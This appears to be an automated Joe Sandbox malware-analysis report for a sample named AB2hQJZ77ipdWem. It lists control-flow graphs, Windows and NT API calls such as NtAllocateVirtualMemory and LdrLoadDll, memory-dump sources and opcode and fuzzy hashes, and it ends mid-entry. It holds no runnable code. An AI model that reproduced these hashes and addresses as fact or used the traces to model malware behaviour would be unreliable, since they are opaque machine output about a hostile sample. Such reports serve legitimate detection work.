                                                      • Opcode ID: ebbdfcbd8268f340328aad02934f50223be726e48a81efa648dae91174054917
                                                      • Instruction ID: 3413e4b46f0aa8a9251d44cbe831f548c2f9da86a982a6dcb69d001b78fcc9f8
                                                      • Opcode Fuzzy Hash: ebbdfcbd8268f340328aad02934f50223be726e48a81efa648dae91174054917
                                                      • Instruction Fuzzy Hash: 96411FB1C00319CFEF24DFA9C84478EBBB5BF89304F24805AC508AB250DB716946CF90

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 2f94ce0-2f96239 CreateActCtxA 3 2f9623b-2f96241 0->3 4 2f96242-2f9629c 0->4 3->4 11 2f962ab-2f962af 4->11 12 2f9629e-2f962a1 4->12 13 2f962b1-2f962bd 11->13 14 2f962c0 11->14 12->11 13->14 16 2f962c1 14->16 16->16
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 02F96229
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 8f8964712a3768d570113340485ffc67e76ede950a25903a506f81c3ca343d4e
                                                      • Instruction ID: 6acba0cbd2c42cb54087fd8bbdab381f256506e4b956ca38239fa8109143b916
                                                      • Opcode Fuzzy Hash: 8f8964712a3768d570113340485ffc67e76ede950a25903a506f81c3ca343d4e
                                                      • Instruction Fuzzy Hash: EC411EB0D00719CFEF24DFA9C844B9EBBB5BF89704F20806AD508AB250DB716945CF90

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 33 2f9b788-2f9b791 35 2f9b793-2f9c228 33->35 36 2f9b7f7-2f9b884 33->36 39 2f9c22a-2f9c22d 35->39 40 2f9c230-2f9c25f LoadLibraryExW 35->40 39->40 41 2f9c268-2f9c285 40->41 42 2f9c261-2f9c267 40->42 42->41
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F9C041,00000800,00000000,00000000), ref: 02F9C252
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: e165e72c0dd77228d20d99c1b6ddf8ba6683c93e425765a7ad0cf191d6888054
                                                      • Instruction ID: 64ca676c134114bdbf13e90a6226afa4756423ead9c8099bd57ba3c431714e64
                                                      • Opcode Fuzzy Hash: e165e72c0dd77228d20d99c1b6ddf8ba6683c93e425765a7ad0cf191d6888054
                                                      • Instruction Fuzzy Hash: 722198B2C043488FEB11CFAAC844BDEBFF4EB99710F04805AD559AB201C3749545CFA6

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 45 2f9d8d0-2f9e2d4 DuplicateHandle 47 2f9e2dd-2f9e2fa 45->47 48 2f9e2d6-2f9e2dc 45->48 48->47
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F9E206,?,?,?,?,?), ref: 02F9E2C7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 78927fdaea7175e611d7aeb5582783064fb8cbed125bd67eb77230be6167f6d3
                                                      • Instruction ID: 263f0de934420d246a2f03dd4dd907a233b7731bf65b221480f96b52aa914136
                                                      • Opcode Fuzzy Hash: 78927fdaea7175e611d7aeb5582783064fb8cbed125bd67eb77230be6167f6d3
                                                      • Instruction Fuzzy Hash: D521D2B5D002499FDB10CFAAD884AEEBBF9EB48310F14845AE914A3350D374A954CFA5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 59 2f9c1e0-2f9c228 61 2f9c22a-2f9c22d 59->61 62 2f9c230-2f9c25f LoadLibraryExW 59->62 61->62 63 2f9c268-2f9c285 62->63 64 2f9c261-2f9c267 62->64 64->63
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F9C041,00000800,00000000,00000000), ref: 02F9C252
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 671874c81f9e91973715b0ad2f3ff734afcd196743c86c0637e5abc9011cb0f3
                                                      • Instruction ID: a374028185d8e589abc152cad724754f2692f292eccc4f025414f8fc7e98af85
                                                      • Opcode Fuzzy Hash: 671874c81f9e91973715b0ad2f3ff734afcd196743c86c0637e5abc9011cb0f3
                                                      • Instruction Fuzzy Hash: 051112B6D003499FDB10CFAAC884BDEFBF5EB88720F14842AE519A7200C375A545CFA1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 51 2f9b7a0-2f9c228 53 2f9c22a-2f9c22d 51->53 54 2f9c230-2f9c25f LoadLibraryExW 51->54 53->54 55 2f9c268-2f9c285 54->55 56 2f9c261-2f9c267 54->56 56->55
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F9C041,00000800,00000000,00000000), ref: 02F9C252
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: c19b1fd1808da6bdc550fdd975142667b919fb6994f6ca07d7760b52881d3f1a
                                                      • Instruction ID: 03ce8c5591da22d45f5847c19b91bfefa0ddc971ea51ee1eb1f9517521466237
                                                      • Opcode Fuzzy Hash: c19b1fd1808da6bdc550fdd975142667b919fb6994f6ca07d7760b52881d3f1a
                                                      • Instruction Fuzzy Hash: 901114B6D003498FDB10DF9AC444B9EFBF4EB88710F10842ED919A7200C375A545CFA5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 67 2f9bf5a-2f9bfa0 69 2f9bfa8-2f9bfd3 GetModuleHandleW 67->69 70 2f9bfa2-2f9bfa5 67->70 71 2f9bfdc-2f9bff0 69->71 72 2f9bfd5-2f9bfdb 69->72 70->69 72->71
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02F9BFC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 99b4faed1790f9b25c3cbd326fe3e5a86605b3916ca08047eaf8ba52ea313fa9
                                                      • Instruction ID: ab36c8a7714fa31a6f3e00ec9a2639489fd650700bf5a1df549901760bae124e
                                                      • Opcode Fuzzy Hash: 99b4faed1790f9b25c3cbd326fe3e5a86605b3916ca08047eaf8ba52ea313fa9
                                                      • Instruction Fuzzy Hash: 70113FB2C002098FDB10DF9AD844BDEFBF4EB88228F10841AD828B3600C378A545CFA1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 74 2f9bf60-2f9bfa0 75 2f9bfa8-2f9bfd3 GetModuleHandleW 74->75 76 2f9bfa2-2f9bfa5 74->76 77 2f9bfdc-2f9bff0 75->77 78 2f9bfd5-2f9bfdb 75->78 76->75 78->77
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02F9BFC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 6f07e6b47e158d272f2c8dd4223713a5c8a50a10e81b4c506cd7dc61ebe60ae6
                                                      • Instruction ID: dcc24a638cf7fc82f9e7634eb4b1cb8f82ede01ee3c3e00fb12d7b2d56767ddf
                                                      • Opcode Fuzzy Hash: 6f07e6b47e158d272f2c8dd4223713a5c8a50a10e81b4c506cd7dc61ebe60ae6
                                                      • Instruction Fuzzy Hash: B5110FB5C002498FDB14DF9AD444B9EFBF4AB88228F10841AD928A7640C379A545CFA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1387105601.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13bd000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0435ebfe470dcd4db114b241a68f0d48c8df1e181d1a47392b4222a2030c3b88
                                                      • Instruction ID: d3e0e2f3def221c7425aa635e163b4cc686785aaf4fdd26038b27e489bf1a29d
                                                      • Opcode Fuzzy Hash: 0435ebfe470dcd4db114b241a68f0d48c8df1e181d1a47392b4222a2030c3b88
                                                      • Instruction Fuzzy Hash: C0213371604204DFDB01DF54D9C0B66BF65FBC832CF20C16AEA090BA46D33AD406CBA2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1387173794.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13cd000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: daf45b22ee472c8534d1fdcadf6eb42b7ef759b1dd40bbd1cdf08021785eaf3a
                                                      • Instruction ID: e5cba209a47b95c00c33ffe002f65789f262f7407e7404cfc57f7a2aa5d13e7a
                                                      • Opcode Fuzzy Hash: daf45b22ee472c8534d1fdcadf6eb42b7ef759b1dd40bbd1cdf08021785eaf3a
                                                      • Instruction Fuzzy Hash: B4210075604304DFDB15DF58D884B16BBA5FB84A28F20C57DE84A0B686C33AD807CBA2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1387173794.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13cd000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6281f05c83a70ae62ef76beb74ac0b34e5029730a492c91b871fc1b609083543
                                                      • Instruction ID: e743e97ec97800d4a1c703604cd2eef94f56a61f883772ac1c7cc505b81aba99
                                                      • Opcode Fuzzy Hash: 6281f05c83a70ae62ef76beb74ac0b34e5029730a492c91b871fc1b609083543
                                                      • Instruction Fuzzy Hash: DE21F575604304DFDB05DF94D9C4B26BB66FB84B28F20C57DE8494B652C336D846CBA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1387173794.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13cd000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef5f85a1d6f5dc7d4911a82bf3f85561a5e9085d1f8f20c35e8e0f439b4b68aa
                                                      • Instruction ID: c2e5b89909fbbbfac9f5c0e42e7888ca78a74c11458140f0e32f26d37a889cc0
                                                      • Opcode Fuzzy Hash: ef5f85a1d6f5dc7d4911a82bf3f85561a5e9085d1f8f20c35e8e0f439b4b68aa
                                                      • Instruction Fuzzy Hash: 1B2162755083849FCB03CF58D994711BF71EB46614F28C5EED8498F2A7C33A9856CBA2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1387105601.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13bd000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                      • Instruction ID: a4971d703f12162160fcb819a2d68ad6801839971dac405eb51347a6f42ca4e0
                                                      • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                      • Instruction Fuzzy Hash: 9B110376504284CFCB02CF54D5C0B56BF72FB84328F24C6AAD9490B657C33AD456CBA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1387173794.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_13cd000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                      • Instruction ID: 051884501f179760eb1d4415144b9ea62b2e42ddc01dba6f41d37c16defa6f55
                                                      • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                      • Instruction Fuzzy Hash: 9311BE76504240DFCB02CF54C5C0B15BB72FB84628F24C6ADE8494B296C33AD80ACB91
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13b996c647a2f96c1c9cd733baebff8f07520263b3bc29258da3ba8cf6a634fc
                                                      • Instruction ID: 2178b064c059d73be870a91f295f6f942e947b367076200c94c95b27dc63e575
                                                      • Opcode Fuzzy Hash: 13b996c647a2f96c1c9cd733baebff8f07520263b3bc29258da3ba8cf6a634fc
                                                      • Instruction Fuzzy Hash: BA613BB29053849FEF02EF75D4893A97FA0BF5A394F2844CEC6859B262D2748501DF52

                                                      Execution Graph

                                                      Execution Coverage:1.4%
                                                      Dynamic/Decrypted Code Coverage:2.7%
                                                      Signature Coverage:5.9%
                                                      Total number of Nodes:562
                                                      Total number of Limit Nodes:70

Control-flow Graph

control_flow_graph 0 41a40b-41a459 call 41af60 NtReadFile
APIs
• NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A455
Memory Dump Source
• Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID: FileRead
• String ID: !JA$bMA$bMA
• API String ID: 2738559852-4222312340
• Opcode ID: 20313963af024c615700d76e46f1c16b80ebe2a678971241950cdfb15c79abed
• Instruction ID: ced4471a4ad639366d53666acf2a20fd0df491fb81fbb65912225195025b137a
• Opcode Fuzzy Hash: 20313963af024c615700d76e46f1c16b80ebe2a678971241950cdfb15c79abed
• Instruction Fuzzy Hash: 16F0C9B1200108AFCB14CF99CC85DDBB7A9EF8C354F158248B91DA7245D630E811CBA0

Control-flow Graph

control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
APIs
• NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A455
Memory Dump Source
• Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID: FileRead
• String ID: !JA$bMA$bMA
• API String ID: 2738559852-4222312340
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
• Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Control-flow Graph

control_flow_graph 234 40ace0-40acfc 235 40ad04-40ad09 234->235 236 40acff call 41cc50 234->236 237 40ad0b-40ad0e 235->237 238 40ad0f-40ad1d call 41d070 235->238 236->235 241 40ad2d-40ad3e call 41b4a0 238->241 242 40ad1f-40ad2a call 41d2f0 238->242 247 40ad40-40ad54 LdrLoadDll 241->247 248 40ad57-40ad5a 241->248 242->241 247->248
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
Memory Dump Source
• Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
• Instruction ID: d67f1bdabad64084b5c4bffe625ae792a434af5b5f697ea898bfaa5690ad8bd1
• Opcode Fuzzy Hash: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
• Instruction Fuzzy Hash: 35015EB5E0020DABDF10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95

Control-flow Graph

control_flow_graph 249 41a360-41a3b1 call 41af60 NtCreateFile
APIs
• NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A3AD
Memory Dump Source
• Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
• Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Control-flow Graph

control_flow_graph 252 41a540-41a57d call 41af60 NtAllocateVirtualMemory
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A579
Memory Dump Source
• Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
• Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Control-flow Graph

control_flow_graph 264 41a48a-41a4b9 call 41af60 NtClose
APIs
• NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4B5
Memory Dump Source
• Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: d32bc822461819c6a7752db4da68354b3548de13911733acaf1a0b72f52fe8b4
• Instruction ID: 9b4dbc26645dc4470c945089ede39bb5ce3be025d73a1c6659f34b0ab2fdb9dd
• Opcode Fuzzy Hash: d32bc822461819c6a7752db4da68354b3548de13911733acaf1a0b72f52fe8b4
• Instruction Fuzzy Hash: 70E08C76240204ABE710EB94CC85EE77B68EB48620F24845ABA5C5B242C630EA0187D0

Control-flow Graph

control_flow_graph 267 41a490-41a4a6 268 41a4ac-41a4b9 NtClose 267->268 269 41a4a7 call 41af60 267->269 269->268
APIs
• NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4B5
Memory Dump Source
• Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
• Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
Memory Dump Source
• Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
• Instruction ID: 380b514f1b228bc081d75c17ae9254c2119d2321acb5c64e8da0945d2a3bd4e4
• Opcode Fuzzy Hash: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
• Instruction Fuzzy Hash: 9B90026224240003410971585514616900A97E1201B55C031E1015590DC72589916225
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                      • Instruction ID: a97d590cc2441fe97374a348ef225c0c7b530a9c885c9f327d0efe79fc82d833
                                                      • Opcode Fuzzy Hash: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                      • Instruction Fuzzy Hash: 1090023224140803D1847158550464A500597D2301F95C025A0026654DCB158B5977A1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                      • Instruction ID: bb80ee6a644a4d13a241bcf70687e77adda06130dc58ec189013a52a0ca52534
                                                      • Opcode Fuzzy Hash: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                      • Instruction Fuzzy Hash: FA90043735140003010DF55C17045075047D7D7351355C031F1017550CD731CD715331
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                      • Instruction ID: 47ec783c13350d00c6fecb8df1eda0765404297098ef74f093caedf616d7b3c8
                                                      • Opcode Fuzzy Hash: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                      • Instruction Fuzzy Hash: 7390022A25340003D1847158650860A500597D2202F95D425A0016558CCB1589695321
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                      • Instruction ID: 4d7fbd2b61014b47c020f5326d3fb0c5a9d228e24a8ab57affeee595efea0222
                                                      • Opcode Fuzzy Hash: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                      • Instruction Fuzzy Hash: 8D90022234140003D144715865186069005E7E2301F55D021E0415554CDB1589565322
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                      • Instruction ID: 07ec84986e349e873418cc0b275f2fe9209d884e2788ae7c54a8e750c7e0b0bb
                                                      • Opcode Fuzzy Hash: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                      • Instruction Fuzzy Hash: D1900222282441535549B15855045079006A7E1241795C022A1415950CC7269956D721
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                      • Instruction ID: 39b11356add0c70f76e2829180d6813ab33b9a01751b46f48a692bb2d15c2d5c
                                                      • Opcode Fuzzy Hash: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                      • Instruction Fuzzy Hash: 1390023224140413D11571585604707500997D1241F95C422A0425558DD7568A52A221
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
